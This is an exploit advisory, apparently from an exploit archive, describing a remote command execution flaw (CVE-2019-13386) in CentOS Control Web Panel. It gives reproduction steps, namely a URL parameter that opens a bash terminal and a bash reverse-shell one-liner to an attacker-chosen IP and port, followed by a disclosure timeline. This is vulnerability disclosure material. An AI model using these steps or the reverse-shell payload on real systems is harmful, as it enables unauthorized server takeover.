CentOS Control Web Panel 0.9.8.836 Remote Command Execution Vulnerability

# Exploit Title: CWP (CentOS Control Web Panel) 0.9.8.836 - Remote Command Execution
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/
# Version: 0.9.8.836
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13386

+++++++++++++++++++++++++++++++++
#  Description:
+++++++++++++++++++++++++++++++++

From the application interface, it does not allow user to run OS commands directly. If user want to run OS commands, they need to do it through crontab function. The vulnerability allows users to executed OS commands directly through web browser.

+++++++++++++++++++++++++++++++++
#  Steps to Reproduce
+++++++++++++++++++++++++++++++++

1. Login into the CentOS Web Panel using user credential
2. Go to file manager
3. add "?action=9" on url , bash terminal will show
   Example: https://[target.com]:2083/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/username/fileManager2.php?action=9
4. Users can run OS commands through web browser
5. Create reverse shell through OS commands 
      - reverse shell payload "bash -i >& /dev/tcp/[local IP Address]/[port] 0>&1"

+++++++++++++++++++++++++++++++++
# POC
+++++++++++++++++++++++++++++++++

https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13386.md

+++++++++++++++++++++++++++++++++
# Timeline
+++++++++++++++++++++++++++++++++
2019-07-05: Discovered the bug
2019-07-05: Reported to vendor
2019-07-05: Vender accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-23: Published
                
+++++++++++++++++++++++++++++++++
# Discovered by
+++++++++++++++++++++++++++++++++
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak

#  0day.today [2019-12-04]  #